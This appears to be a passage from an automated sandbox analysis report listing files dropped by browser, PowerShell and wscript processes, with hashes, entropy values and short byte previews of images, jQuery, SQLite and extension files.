                                                                                                                                                                            Preview:/*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},S=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||S).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):20069
                                                                                                                                                                            Entropy (8bit):7.958380896037087
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:S9Od2BaVN690B/DHhnbk+bDApttq3o54wLShRxn9K7tyYnWVMSX4UsYBKcH7oMdK:SQd2BUmGD1Q+fAptM3DwkRxkVWV40lHS
                                                                                                                                                                            MD5:BBBCECCD508AAD0B35F44C261B6A2608
                                                                                                                                                                            SHA1:1A70962A9B5D039843BF20376778B149E1EB1987
                                                                                                                                                                            SHA-256:919EF365314D75F04CF1BBE006517E2970432F5CD97844ECEA1E1B4DBD4CF3B6
                                                                                                                                                                            SHA-512:EE3CB283962814266B5CF7A20E247AB5679C3F592EE9F078C5AEA5E0F492594F3D70F0FA9C5D10A6B0B46825E78B25BA642D1B635EDF48CF6C4693A3AAC56A43
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...~.....w..?.....(>.r..g.....u..X[v..+..O..h.y.H... ....K.'...9).F...z......{K).6..9?..y'.f...I....4...]\5....B..uP.Y.X.oP.O$w..g..o..C0.'..Z...*.+(....&.2.~c...L.mv.<...u...f..:..U>.....~&:t..6.4.....\-%*.....e.$.cz...=.e.1.C.@..].......n.......P-......_-..]g.Z..&K..1....k...:vr.....6.e'O.OR....,[.&....6.f.kf.......8<_..{...[.{?.4..n...2@5.g..*...}7.
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):19306
                                                                                                                                                                            Entropy (8bit):7.957627780954709
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:StDgdb+HfghcO0srx/e6tVp4/XxGFZe8Z+Jl7I5pA86KRHjHbr:Stcdb+/1OJ/Ry88r78pAxUDH3
                                                                                                                                                                            MD5:24F6C4A5746511D2AAD3CAD795C620C2
                                                                                                                                                                            SHA1:1C23EF8986889559C587A6FD306BC5724494C7B2
                                                                                                                                                                            SHA-256:0CF65C36E5BE8713EC17C721ADD5A4514B37290E066C20B5B50D3234665F94CB
                                                                                                                                                                            SHA-512:DE2759744A33D4F1165625291C36B760CABA847FD960295F85E79857D20F05C965E9B95A8224B73F38E781989377677546DD21C21B8B92C18369585116FECC02
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.u.."...Yk+B[?)...C..L.~......\...^.<DiI.....7...:~.&..,.......j...y6....<Vu.i.X..@.....$.PI.8'....qnk.Q.(...p..l..I..f.9...o1.1.l......-v}..'...L.{../.].x.?-.|.._Zx..ir...~0.-..q..x......JO.8.:..Iw-h.S...g....k,....W....exn..[..`...|7...:v.'...?W....}.FG.=E}.X.u.......i.c*.Iy..Yf..I..}.UyK(3._.WF<...[.u=..n%1.+~A......*..q.T~$.w.&.......j.R...\C.]`d.Q...
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):19051
                                                                                                                                                                            Entropy (8bit):7.965999992554655
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:S/9HOKNl9dW443vkpnYPBktRjso10TMKRYG9muG5MglR:SFr5MMxrRjxKQKRYqbbglR
                                                                                                                                                                            MD5:178E525918C8BFFD4F031CDC399FC916
                                                                                                                                                                            SHA1:21B128318AA6689BB013CD90F640252AB1D8F85E
                                                                                                                                                                            SHA-256:67C8A9650AB5261B9CC99247624996931DFB45D503BA8BAFD75F7707AD484981
                                                                                                                                                                            SHA-512:D9B880403251CD1EC3840939012E1A8781144C8DBB19D1AA8D4DA5FBF69C888126FC2B3BDA5349430B3BDC5BEA3AFD24B4C7392CA704719D8351AFC215F3D04B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...o.[..8..-.....k[..i..v......I.]0.=..s..dVS.RB...q?-.=..\V.mt.W.......h..Q..U...._.-.....uh&..D.|wc%..y....l{..yd.UO.......5:.....\...m...X.......l..'..;Q..</.[].%.....G.$}..zH..x.+-29!.t...+"...Q.6..s.....YC..............tp.91W#i#.#."v+r......U.........,.}*.RE..q\C...E.......b..tQI...k .?..v.4."....&.....-.....L.~#.........v.!"...KY.c_FUJN......`....
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                                                                            MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                                                                            SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                                                                            SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                                                                            SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:@...e.................................&..............@..........
                                                                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                            Entropy (8bit):1.1220878973775341
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:KdM2qOB1nxCkTSAELyKOMq+8yC8F/YfU5m+OlT:Kvq+n0I9ELyKOMq+8y9/Ow
                                                                                                                                                                            MD5:609B497EE21C071513ED99128FD7BBA5
                                                                                                                                                                            SHA1:A6C6FCD5CF1EC5D9584335BE994ABADC2FA6705D
                                                                                                                                                                            SHA-256:8B1566190776285A27BFA5342B1BD0CF0DD4C0B80FD6DF30892A5519E20AA647
                                                                                                                                                                            SHA-512:C0EBE69DC37944F482A736DB622432DBC3C37464B85AE5881AB61570E81381E6C0A1210BA0EB0D2D2482145BF5FD479C47FA21DDC6CC4E88753438FD43326846
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):242356
                                                                                                                                                                            Entropy (8bit):7.991210403664034
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:6144:nvRDe2ei//LiBCNBs4vIVeMRhzb6d0X7ayNC:nde2edcbveZRFW0X2yk
                                                                                                                                                                            MD5:B73A9C52EF76DD9F575BDCF919B05902
                                                                                                                                                                            SHA1:A7ED2E7B5F85D6E502B538FDEBD91343D811E55A
                                                                                                                                                                            SHA-256:EF05EE3FA07D46FDDD88DA7760509F7BA658D3A9A5696004404F5A128349B323
                                                                                                                                                                            SHA-512:01EB2E462F3EDE544A66C0EEABA9172B668B6EA20D2FEF5A3DD2217E60ED42F70523F194B8901A48CDA3E55E1F65A14BAB2FBE3B34D2CB410B1939B9BB7B4CBC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...........}.w..._..W.2...W.N&....I..k..'@..Y...c...~K..3vB....#.K.........R.Q.%.4......+.r.M?.\....l....q......Xo\..6.u..q.i.[V_...u..M0...LK......)KcyM.<#....q.$..n<..f5.'..V3oY.v.....k....f.kul...F..4.^..^.(r}.k..[...?.....Y..K.9.VZ..r.c.m..wL.n....L+7.fnY..j.r..v..;P..Xz....~..;....yO3.P.`.]H2u...]...zV....[..m...v;...6.....8.._.l...;NK..W.4...G.....4...>..F.xl.Z..B?.zAcZO.....VI.(}f..j.k..)._...z.72-h.Fj....o.WB..~.gO..5-da+PW....H..n......q......W..5.C.+m..u.~.<.....E.uf?.?...3.......$@+......Z..6..4...&..Mz..W..~...V-}@'.w....t..nx..,.....0b.:QR'..W|#2b.....3}....wP.5.n..j.&...8q-H#O4.{/..G.....%.@(.&...M.5X,3(.d.L3~[.Yp.^.m../4...OB..u .=.7...:.N.k.m......... T..6!8......._. ..?..<...v...X.F.....<,....01.+...H.'....<...E......O..%P..-HH[M.......1[.7@H....eBJw.|....x.....i.....i.&.B.A.L.l..T...6..z....4).Y.F.%.>.o.a6{vw.=..F....e..e|.i.4.n.O-.1.FK.Z+..x@..$...?..C.....t....>...O...n.mN{.R .@.uNG...p.TT......9#=.z.j.....Oa..S.a;.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):138356
                                                                                                                                                                            Entropy (8bit):7.809609231921042
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                            MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                            SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                            SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                            SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2110
                                                                                                                                                                            Entropy (8bit):5.39879698280366
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854RrE:8e2Fa116uCntc5toY2etjLM
                                                                                                                                                                            MD5:F4AFE9F42AD260C737F97FFEF43B3CE1
                                                                                                                                                                            SHA1:3BF51ABC2B2632A373270FDF802F69DDABD892BC
                                                                                                                                                                            SHA-256:8B60DC6873E82059941938B6DE2DBC158DDAA7A736DD3B86FA508CF88C4F978F
                                                                                                                                                                            SHA-512:A86C1E065D1635C269A3CE79131C6AB1646C57F7F40190E81AE24A08D4CB5ECF9633A5DFFBF66EE749D5B664A60BF05881C6A303AD0827206593B3F7E6708943
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4982
                                                                                                                                                                            Entropy (8bit):7.929761711048726
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                            MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                            SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                            SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                            SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):908
                                                                                                                                                                            Entropy (8bit):4.512512697156616
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                            MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                            SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                            SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                            SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1285
                                                                                                                                                                            Entropy (8bit):4.702209356847184
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                            MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                            SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                            SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                            SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                            Malicious:false
